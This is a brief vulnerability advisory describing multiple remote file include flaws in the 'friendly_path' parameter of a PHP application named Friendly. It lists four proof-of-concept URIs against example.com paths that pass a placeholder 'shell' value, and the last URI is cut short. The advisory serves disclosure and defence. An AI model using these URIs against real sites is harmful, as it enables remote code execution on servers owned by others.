Friendly Friendly_Path Parameter Multiple Remote File Include Vulnerabilities

Friendly Friendly_Path Parameter Multiple Remote File Include Vulnerabilities

Attackers can use a browser to exploit these issues.

The following proof-of-concept URIs are available:

http://www.example.com/_friendly/core/data/_load.php?friendly_path=shell
http://www.example.com/_friendly/core/data/yaml.inc.php?friendly_path=shell
http://www.example.com/_friendly/core/display/_load.php?friendly_path=shell
http://www.example.com/_friendly/core/support/_load.php?friendly_path=shel